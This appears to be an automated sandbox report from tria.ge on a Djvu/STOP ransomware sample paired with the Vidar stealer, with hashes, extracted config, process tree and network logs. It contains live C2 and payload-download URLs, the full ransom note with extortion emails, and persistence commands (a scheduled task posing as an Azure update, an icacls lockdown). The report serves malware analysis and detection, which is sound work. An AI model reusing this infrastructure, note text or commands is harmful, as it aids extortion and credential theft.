Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    194s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10/02/2023, 20:14 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe

  • Size

    885KB

  • MD5

    aebaf99cc73c4c6a138674be3233113f

  • SHA1

    d4cb12d55649a0443ee7f77fed25e6f343ab9ec9

  • SHA256

    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819

  • SHA512

    61c8baa08a7a029d29019cf1c7191ad686c7241bcde66a514aa83b85159a23a33e65b67adea3e96fa06621e80346573ca5e64820701d70e58afa4bbcd6219c28

  • SSDEEP

    12288:aKrqlB4+CBeAGfFrwcCNcTyt0uLZBnAv88p/tYvI9rPe7mhnfWE:aKr+BmufFrnT14fAvTtYAJUOnfW

Score
10/10
djvuvidar19discoverypersistenceransomwarespywarestealer

Malware Config

Extracted

Family

djvu

C2

http://bihsy.com/test1/get.php

Attributes
  • extension

    .vvmm

  • offline_id

    9c20OtJsXdFeF07b1IeFK5ERGv1zIb659YG380t1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://bihsy.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-IiDRZpWuwI Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0643JOsie

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6h7nJWDnbbRag7AnnYTn
3
YOgu/2t2n1gxCgcNzgPpWWis9O2CpiE7utirJhRttD2h1cjVK9zgfk6ecYi46d9c
4
124DIbfHL9a+ropMNLbkTSDV/JW950Q2Gz5va99VgsbcrCHAQewmJIvbxhxJqYzl
5
/cS9Z3oETgRa5Q2lLZKZfJOYX/ppbEH5a3c9ZKajDrH4AcN7v2r8j9+aPPlduhtc
6
ibc2+hd1hTustwSO8WLYLWGWyshZXDWryhc2Uy15J8gHlCbeVlYLz/rSjqE8+46p
7
aq4S2RSuYsVMfi4s1bHo99oDmcm7OoawLaMpL/bAOd8Z4ynl//dglJRTKdAcSliC
8
VQIDAQAB
9
-----END PUBLIC KEY-----

Extracted

Family

vidar

Version

2.4

Botnet

19

Attributes
  • profile_id

    19

Signatures

  • Detected Djvu ransomware 9 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    "C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
      "C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\e63cd999-c211-4a3f-90f5-81d2eef9c949" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:2300
      • C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
        "C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4844
        • C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
          "C:\Users\Admin\AppData\Local\Temp\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5108
          • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe
            "C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4392
            • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe
              "C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1872
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe" & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4104
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  8⤵
                  • Delays execution with timeout.exe
                  PID:5008
          • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build3.exe
            "C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build3.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:652
            • C:\Windows\SysWOW64\schtasks.exe
              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
              6⤵
              • Creates scheduled task(s)
              PID:2264
  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4792
    • C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      2⤵
      • Creates scheduled task(s)
      PID:5028

Network

  • flag-us
    DNS
    api.2ip.ua
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    8.8.8.8:53
    Request
    api.2ip.ua
    IN A
    Response
    api.2ip.ua
    IN A
    162.0.217.254
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Fri, 10 Feb 2023 20:16:19 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Fri, 10 Feb 2023 20:16:25 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    uaery.top
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    8.8.8.8:53
    Request
    uaery.top
    IN A
    Response
    uaery.top
    IN A
    211.40.39.251
    uaery.top
    IN A
    187.224.76.178
    uaery.top
    IN A
    190.229.19.7
    uaery.top
    IN A
    186.182.55.44
    uaery.top
    IN A
    58.235.189.192
    uaery.top
    IN A
    31.166.210.92
    uaery.top
    IN A
    190.141.35.3
    uaery.top
    IN A
    222.236.49.124
    uaery.top
    IN A
    211.119.84.112
    uaery.top
    IN A
    176.226.77.74
  • flag-us
    DNS
    bihsy.com
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    8.8.8.8:53
    Request
    bihsy.com
    IN A
    Response
    bihsy.com
    IN A
    138.36.3.134
    bihsy.com
    IN A
    187.232.159.50
    bihsy.com
    IN A
    190.141.35.3
    bihsy.com
    IN A
    195.158.3.162
    bihsy.com
    IN A
    222.236.49.123
    bihsy.com
    IN A
    86.122.83.142
    bihsy.com
    IN A
    31.166.210.92
    bihsy.com
    IN A
    211.40.39.251
    bihsy.com
    IN A
    211.119.84.111
    bihsy.com
    IN A
    79.102.150.149
  • flag-kr
    GET
    http://uaery.top/dl/build2.exe
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    211.40.39.251:80
    Request
    GET /dl/build2.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: uaery.top
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Feb 2023 20:16:26 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
    Last-Modified: Mon, 06 Feb 2023 21:32:32 GMT
    ETag: "69a00-5f40ec4cff651"
    Accept-Ranges: bytes
    Content-Length: 432640
    Connection: close
    Content-Type: application/octet-stream
  • flag-br
    GET
    http://bihsy.com/test1/get.php?pid=B09A41503E496C131596D5CE68E06FCE&first=true
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    138.36.3.134:80
    Request
    GET /test1/get.php?pid=B09A41503E496C131596D5CE68E06FCE&first=true HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: bihsy.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Feb 2023 20:16:26 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Content-Length: 558
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-br
    GET
    http://bihsy.com/files/1/build3.exe
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Remote address:
    138.36.3.134:80
    Request
    GET /files/1/build3.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: bihsy.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Feb 2023 20:16:30 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
    ETag: "2600-5c86757379380"
    Accept-Ranges: bytes
    Content-Length: 9728
    Connection: close
    Content-Type: application/x-msdownload
  • flag-us
    DNS
    t.me
    build2.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/gurutist
    build2.exe
    Remote address:
    149.154.167.99:443
    Request
    GET /gurutist HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
    Host: t.me
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Feb 2023 20:16:47 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12339
    Connection: keep-alive
    Set-Cookie: stel_ssid=7299ce17ad442fb9bb_8613686362800740776; expires=Sat, 11 Feb 2023 20:16:47 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-us
    DNS
    t.me
    build2.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-us
    DNS
    crl.godaddy.com
    build2.exe
    Remote address:
    8.8.8.8:53
    Request
    crl.godaddy.com
    IN A
    Response
    crl.godaddy.com
    IN CNAME
    gdcrl.godaddy.com.akadns.net
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.31
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.36
    gdcrl.godaddy.com.akadns.net
    IN A
    192.124.249.41
  • flag-us
    GET
    http://crl.godaddy.com/gdroot.crl
    build2.exe
    Remote address:
    192.124.249.31:80
    Request
    GET /gdroot.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: crl.godaddy.com
    Response
    HTTP/1.1 200 OK
    Server: Sucuri/Cloudproxy
    Date: Fri, 10 Feb 2023 20:16:46 GMT
    Content-Type: application/x-pkcs7-crl
    Content-Length: 481
    Connection: keep-alive
    X-Sucuri-ID: 19031
    Last-Modified: Tue, 29 Nov 2022 21:50:30 GMT
    ETag: "1e1-5eea2fa0b933d"
    Cache-Control: public, no-transform, must-revalidate
    Expires: Sat, 03 Dec 2022 18:03:06 GMT
    P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
    X-Sucuri-Cache: HIT
    Accept-Ranges: bytes
  • flag-de
    GET
    http://23.88.36.149/19
    build2.exe
    Remote address:
    23.88.36.149:80
    Request
    GET /19 HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Host: 23.88.36.149
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Feb 2023 20:16:48 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    http://23.88.36.149/package.zip
    build2.exe
    Remote address:
    23.88.36.149:80
    Request
    GET /package.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Host: 23.88.36.149
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Feb 2023 20:16:48 GMT
    Content-Type: application/zip
    Content-Length: 2685679
    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
    Connection: keep-alive
    ETag: "631f30d3-28faef"
    Accept-Ranges: bytes
  • flag-de
    POST
    http://23.88.36.149/
    build2.exe
    Remote address:
    23.88.36.149:80
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----4729729307825840
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Host: 23.88.36.149
    Content-Length: 154152
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Feb 2023 20:16:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    1.0kB
     8.1kB
     14
    10

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 104.208.16.90:443
    322 B
     7
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    1.1kB
     8.2kB
     17
    12

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 211.40.39.251:80
    http://uaery.top/dl/build2.exe
    http
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    15.3kB
     445.9kB
     324
    323

    HTTP Request

    GET http://uaery.top/dl/build2.exe

    HTTP Response

    200
  • 138.36.3.134:80
    http://bihsy.com/test1/get.php?pid=B09A41503E496C131596D5CE68E06FCE&first=true
    http
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    413 B
     974 B
     6
    5

    HTTP Request

    GET http://bihsy.com/test1/get.php?pid=B09A41503E496C131596D5CE68E06FCE&first=true

    HTTP Response

    200
  • 138.36.3.134:80
    http://bihsy.com/files/1/build3.exe
    http
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    646 B
     10.5kB
     12
    11

    HTTP Request

    GET http://bihsy.com/files/1/build3.exe

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/gurutist
    tls, http
    build2.exe
    1.5kB
     19.4kB
     24
    20

    HTTP Request

    GET https://t.me/gurutist

    HTTP Response

    200
  • 192.124.249.31:80
    http://crl.godaddy.com/gdroot.crl
    http
    build2.exe
    356 B
     1.1kB
     5
    3

    HTTP Request

    GET http://crl.godaddy.com/gdroot.crl

    HTTP Response

    200
  • 23.88.36.149:80
    http://23.88.36.149/
    http
    build2.exe
    265.7kB
     2.8MB
     2109
    2074

    HTTP Request

    GET http://23.88.36.149/19

    HTTP Response

    200

    HTTP Request

    GET http://23.88.36.149/package.zip

    HTTP Response

    200

    HTTP Request

    POST http://23.88.36.149/

    HTTP Response

    200
  • 8.8.8.8:53
    api.2ip.ua
    dns
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    56 B
     72 B
     1
    1

    DNS Request

    api.2ip.ua

    DNS Response

    162.0.217.254

  • 8.8.8.8:53
    uaery.top
    dns
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    55 B
     215 B
     1
    1

    DNS Request

    uaery.top

    DNS Response

    211.40.39.251
    187.224.76.178
    190.229.19.7
    186.182.55.44
    58.235.189.192
    31.166.210.92
    190.141.35.3
    222.236.49.124
    211.119.84.112
    176.226.77.74

  • 8.8.8.8:53
    bihsy.com
    dns
    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    55 B
     215 B
     1
    1

    DNS Request

    bihsy.com

    DNS Response

    138.36.3.134
    187.232.159.50
    190.141.35.3
    195.158.3.162
    222.236.49.123
    86.122.83.142
    31.166.210.92
    211.40.39.251
    211.119.84.111
    79.102.150.149

  • 8.8.8.8:53
    t.me
    dns
    build2.exe
    50 B
     66 B
     1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    t.me
    dns
    build2.exe
    50 B
     66 B
     1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    crl.godaddy.com
    dns
    build2.exe
    61 B
     151 B
     1
    1

    DNS Request

    crl.godaddy.com

    DNS Response

    192.124.249.31
    192.124.249.36
    192.124.249.41

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
    Filesize

    2KB

    MD5

    88c1baba352577878a6c51f9ef6523de

    SHA1

    5a2e09c7386f4e2aa1a1fa42708566fff97fa59c

    SHA256

    582345ce77a9dca1a30e0f55591fb2bb1bff51ea3f169eb76afb6914fabd5029

    SHA512

    fff3ad502996c43af8c4518fc94364c2a7ec74f27af01bd6e0438cb09550679d7c02b15735231c4414935dbb4398dc6238101de4898351fdbf06f7d381fddf62

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
    Filesize

    1KB

    MD5

    1b11a6392d2c43073e05c7ea57724b91

    SHA1

    684593b291c26ba749c7bd07a76d1b6f1ff616e1

    SHA256

    1166ec0c19ebb36567b96b919573eacb2279bdff4367ebd5abf6182c918976dc

    SHA512

    87d9c26d11a95df4b6d08453f3183c9d7d77dbd420f9f52b73aed18122cac573f698a1a094effdcd8118f7f5bc519b9f7de1ebd64d5fc86e886f9546bff3052e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
    Filesize

    488B

    MD5

    9105bbb9a6ca7b0afd4add56930264c7

    SHA1

    b88c70f977e27e958ffa627b89c81d5e70405cb8

    SHA256

    7ce74076cec8b29b3b2bd61869ad9d062e046e5f627b243e87b96cdd31301488

    SHA512

    8ca9509c7fe536289cdc038acd744467f236c6bf1001be36a2f04412c2fe11badcb1b1598af83239a8abd54b22b8c837fc09dd81d101b7e885371bc83b9640e3

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
    Filesize

    482B

    MD5

    d80ede77b5cb63d3e5cb556d2b1c312f

    SHA1

    56df43b3f2a68bb35cad58db02415476a78c4c56

    SHA256

    ebe31c00618efc6c483361e2606754d8475b1c70252a6a1ec8bbed91c4c2a93c

    SHA512

    b5e560d92f49d5ae457d896b9821f0aab2d8e30d71d5c3cdb6e9498fe8daa6e5fd05040a43ecc608e5f1f26bedb1ee1e52ab1b5cb3f82542b05d53953c4252b8

    Download Submit

  • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe
    Filesize

    422KB

    MD5

    0b622eb410bfb32c5fa7b45eb3c116d2

    SHA1

    606d111174079e4d784e95f285805f14116e6d63

    SHA256

    9b7b45434353b99f97d33f44e225e71b9c164cd21ae56335c078cca20ae29c1d

    SHA512

    ffc1c0caf526c598624845c4d15df2fd68309f8027373c971ed7405f1bda52e89db6b936ce11937d038c3c1a2dba4fcbc70ba8f28d8d1aa4bf4325f08a6a61c4

    Download Submit

  • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe
    Filesize

    422KB

    MD5

    0b622eb410bfb32c5fa7b45eb3c116d2

    SHA1

    606d111174079e4d784e95f285805f14116e6d63

    SHA256

    9b7b45434353b99f97d33f44e225e71b9c164cd21ae56335c078cca20ae29c1d

    SHA512

    ffc1c0caf526c598624845c4d15df2fd68309f8027373c971ed7405f1bda52e89db6b936ce11937d038c3c1a2dba4fcbc70ba8f28d8d1aa4bf4325f08a6a61c4

    Download Submit

  • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build2.exe
    Filesize

    422KB

    MD5

    0b622eb410bfb32c5fa7b45eb3c116d2

    SHA1

    606d111174079e4d784e95f285805f14116e6d63

    SHA256

    9b7b45434353b99f97d33f44e225e71b9c164cd21ae56335c078cca20ae29c1d

    SHA512

    ffc1c0caf526c598624845c4d15df2fd68309f8027373c971ed7405f1bda52e89db6b936ce11937d038c3c1a2dba4fcbc70ba8f28d8d1aa4bf4325f08a6a61c4

    Download Submit

  • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build3.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Local\9c014a21-dc64-4411-a500-f1bada2933df\build3.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Local\e63cd999-c211-4a3f-90f5-81d2eef9c949\0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819.exe
    Filesize

    885KB

    MD5

    aebaf99cc73c4c6a138674be3233113f

    SHA1

    d4cb12d55649a0443ee7f77fed25e6f343ab9ec9

    SHA256

    0736afc494646390af85c92a0bfe87b8648e65c8cc5474de8d7695fe3af75819

    SHA512

    61c8baa08a7a029d29019cf1c7191ad686c7241bcde66a514aa83b85159a23a33e65b67adea3e96fa06621e80346573ca5e64820701d70e58afa4bbcd6219c28

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    Filesize

    9KB

    MD5

    9ead10c08e72ae41921191f8db39bc16

    SHA1

    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

    SHA256

    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

    SHA512

    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

    Download Submit

  • \ProgramData\mozglue.dll
    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    Download Submit

  • \ProgramData\nss3.dll
    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

